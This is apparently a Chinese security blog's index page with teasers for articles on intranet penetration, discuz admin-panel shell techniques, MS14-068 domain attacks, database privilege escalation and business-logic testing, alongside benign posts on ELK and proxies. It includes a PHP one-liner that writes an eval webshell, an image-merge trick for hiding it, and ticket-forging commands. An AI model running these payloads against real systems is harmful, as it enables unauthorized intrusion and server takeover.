记一次内网渗透
因为一客户的关系,需要搞定几个主站,收集一波信息下来,发现有waf,防火墙。略显棘手,找了一下子域,很偶然的机会挖到了一个任意文件上传,曲线救国路线开始,运气很好,在那几个主站在同一个网段。所以很顺利的搞定。 进入内网了,我一般走四条路, 1,走web继续搞webshell。 2,扫描弱口令,比如最喜欢的mssql,ipc$等。 3,主机层面的漏洞,比如ms17010。...
View Article某一功能测试脚本
帮公司测试写的一个功能测试脚本。需要尽量少用第三方库,但其实还是用到了,连接ssh必须需要用到。 # coding:utf-8 import socket import sys import os import paramiko import subprocess from subprocess import Popen,PIPE print "\033[0;31m " print '''...
View ArticleClik here to view.
discuz后台拿shell姿势
昨晚遇到一个站点,好久不玩discuz都不会了。 做个笔记记录一下。 1.包含文件拿shell copy 1.jpg/b+1.txt/a 2.jpg 1.txt内容为: <?php fputs(fopen(‘f.php’,’w’),'<?php eval($_POST[“f”]);?>’);?> 上传图片: 门户-专题管理-创建专题-本地上传...
View Articlelinux使用polipo实现全局代理
sudo apt-get install python-pip sudo pip install shadowsocks apt-get install polipo sublime软连接: ln -s /opt/sublime_text/sublime_text /usr/bin/sublime sudo sublime /etc/shadowsocks.json 增加如下内容: {...
View Article域渗透那几个技巧
做个备份,最近用的比较多。 ms14068漏洞利用: 生成TGT: whoami /all python ms14068.py -u admin@xxx.com -p password -s sid -d dc.xxx.com ms14068.exe -u admin@xxx.com -p password -s sid -d dc.xxx.com...
View ArticleClik here to view.
业务安全测试的一些实例
近期做的一些业务安全方面的测试,其实毫无技术含量,就是想总结一下经常测试的点以及遇到的奇葩问题。 1.P2P常见逻辑漏洞(加车、下单、结算、支付等) 2.账号体系常见逻辑漏洞(注册、登录、撞库、密码重置、验证码绕过等), 3.水平垂直越权、 4.社区视频刷人气、刷点击量、遍历发回帖、刷播放量、刷积分等。 1.用户名枚举+任意用户登陆 在登陆处抓包,用不同的用户名根据返回长度来确定用户名是否存在。...
View ArticleELK stack收集nginx Log
为了简化所有的东西我都装在一台机器,其实其他的集群的话 1.设置静态ip ip a cd /etc/sysconfig/network-scripts/ vi ifcfg-ens160 BOOTPROTO=static PEERROUTES=yes IPADDR=192.168.1.138 GATEWAY=192.168.1.1 NETMASK=255.255.255.0 ONBOOT=yes...
View Article常见数据库提权方式
应公司所需,给各位研发大哥使用,特此准备一份,同时来这里备个份。 常见数据库提权方式 一. MySQL提权 1.1 UDF提权 udf提权这是最常见的提权方式了,但是往往在执行过程中老是遇到”Can’t open shared library”的情况,这里我们可以利用NTFS ADS流来解决这个问题。 1、最常见的是直接使用udf.php此类的工具来执行udf提权,具体如下。...
View ArticleClik here to view.
百度链接批量提交脚本
需要用到花了几分钟写了一脚本,我加了个循环执行。省得去理了。就可以自动最新的东西提交给百度了。 # coding:utf-8 import time import requests from bs4 import BeautifulSoup '''从文件获取url''' def get_url_from_txt(url): with open(url, 'r') as f: payload =...
View Article
